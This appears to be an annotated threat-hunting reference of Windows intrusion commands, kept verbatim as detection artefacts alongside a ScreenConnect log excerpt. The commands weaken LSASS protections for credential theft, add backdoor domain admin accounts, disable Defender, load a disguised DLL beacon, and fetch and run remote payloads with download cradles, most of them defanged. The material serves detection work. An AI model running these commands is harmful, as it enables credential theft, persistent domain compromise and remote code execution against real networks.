# Adversary prep sequence run as local admin: hide a dropped tool, weaken LSASS
# protections for credential theft, then open remote-access paths (RDP, WMI) and
# pull a second stage. Kept byte-exact: these lines are the detection artefacts.
# SystemComponent=1 hides the "nvspbind" entry from Programs and Features.
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f
# Disables LSA protection (RunAsPPL) so LSASS can be opened by unprotected tools.
# Only takes effect after a reboot, and cannot be undone this way where the
# setting was UEFI-locked -- a write of 0 here is alert-worthy regardless.
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
# UseLogonCredential=1 makes WDigest keep clear-text passwords in LSASS memory
# for subsequent logons (classic pre-dumping step). Alert on any write of 1.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
# Duplicate of the first line, as recorded in the original.
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f
# Inbound 3389 allow; the bare rule name "rdp" is a usable hunting string.
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
# Enables the built-in WMI firewall rule group (remote WMI for lateral movement).
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
# fDenyTSConnections=0 turns Remote Desktop on.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# In-memory download cradle (URL defanged with [.]); the \" are copy escapes,
# not part of the original command line. Filename "injcet.ps1" is as observed.
powershell -command \"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\"
# Check for Administrator rights
# Bails out unless the current token is in the built-in Administrators role.
# Note: this only tests the *current* token; an admin running in a non-elevated
# (UAC-filtered) session fails the check, which is the intended behaviour.
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {
Write-Host 'Please Run as Administrator!' -ForegroundColor Red
Exit
}
# Check and return current user name
# Takes the part after the backslash of DOMAIN\user. If the identity name has no
# backslash, [1] is $null -- NOTE(review): confirm whether callers can hit that.
$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1]
# Paths
# Excerpt from Application.evtx EventID 0
# Written by the ScreenConnect client service when the remote operator pushed two
# PowerShell scripts (RunSchedulerTask.ps1, RunSchedulerTaskOnce.ps1) to the host.
# Hunt key: Application channel, EventID 0, message starting
# "Transferred files with action 'Transfer':" -- lists every file the operator sent.
# The hex suffix on the install directory presumably ties the client to one
# ScreenConnect server instance; pivot on it across hosts (confirm in your estate).
EventData:
Data:
- "Transferred files with action 'Transfer':\r\nRunSchedulerTask.ps1\r\nRunSchedulerTaskOnce.ps1\r\n\r\nVersion: 22.10.11109.8417\r\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (9dd8b1107d6a42d9)\\ScreenConnect.ClientService.exe\r\n"
Channel: Application
EventID: 0
EventID_attributes:
# Timestamp is UTC (trailing Z); convert before correlating with local-time logs.
SystemTime: "2024-02-23T04:06:06Z"
# Domain-level persistence: create a backdoor account and add it to every
# high-privilege group. Account name "default" and password "test@2021!" are the
# IoCs to hunt; on the DCs this shows as 4720 (account created) followed by
# 4728/4756 (member added to a security-enabled group).
net user /add default test@2021! /domain
# The \" sequences are copy escapes; net.exe saw plain double quotes.
net group \"Domain Admins\" default /add /domain
net group \"Enterprise Admins\" default /add /domain
net group \"Remote Desktop Users\" default /add /domain
# GPO creation rights and Schema Admins give forest-wide reach beyond DA.
net group \"Group Policy Creator Owners\" default /add /domain
net group \"Schema Admins\" default /add /domain
# Explicit enable in case the account was created disabled by policy.
net user default /active:yes /domain
# Second backdoor account; the repeated line fails ("account already exists")
# and is recorded here as observed.
net user /add default1 test@2021! /domain
net user /add default1 test@2021! /domain
# Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf
# The ".pdf" name is a disguise: the payload is loaded as a DLL below.
#Exclude directory in Defender
# Excludes the whole of C:\ProgramData so the dropped DLL is never scanned.
# Exclusion changes surface as Defender operational event 5007 and in
# Get-MpPreference -- alert on exclusions for broad paths like this.
powershell.exe Add-MpPreference -ExclusionPath C:\\programdata -Force
#Deploy beacon
# rundll32 ignores the file extension; "UpdateSystem" is the exported entry
# point. Hunt for rundll32 loading non-.dll files from ProgramData.
rundll32.exe c:\\programdata\\update.dat UpdateSystem
# Hosted config files (config5..config14.json) the adversary staged on
# transfer[.]sh. The array is truncated in this excerpt -- note the trailing
# comma on the last element. transfer[.]sh links typically expire, so capture
# and hash the content while any are still live rather than only noting URLs.
$listi = 'hxxps[://]transfer[.]sh/UFQTwgYszH/config14[.]json',
\'hxxps[://]transfer[.]sh/ATVMNG5Pbu/config13[.]json',
\'hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json',
\'hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json',
\'hxxps[://]transfer[.]sh/lyEkHLGt03/config10[.]json',
\'hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json',
\'hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json',
\'hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json',
\'hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json',
\'hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json',
# Second-stage cradle (injcet2.ps1), same transfer[.]sh host as the first stage;
# the \" are copy escapes. Defanged with [.] -- do not "fix" the URL.
powershell -command \"iex ((New-Object System[.]Net[.]WebClient).DownloadString('hxxps[://]transfer[.]sh/gUHRYTNxj8/injcet2[.]ps1'))\"
# Built-in Windows curl.exe fetches the DLL-disguised-as-PDF into the path that
# the rundll32 "UpdateSystem" line above loads. Hunt for curl.exe writing to
# ProgramData and for .dat files with MZ headers.
curl hxxp[://]minish[.]wiki[.]gd/c[.]pdf -o c:\\programdata\\update[.]dat
#adversary excluded directories and neutralised Defender
powershell -ep bypass -c \"Set-MpPreference -DisableRealtimeMonitoring $true;
Set-MpPreference -ExclusionPath C:\\Windows\\Temp;
#then downloaded their file
Invoke-WebRequest http://159[.]65[.]130[.]146:4444/svchost.exe -OutFile C:\\Windows\\Temp\\svchost.exe;
C:\\Windows\\Temp\\svchost.exe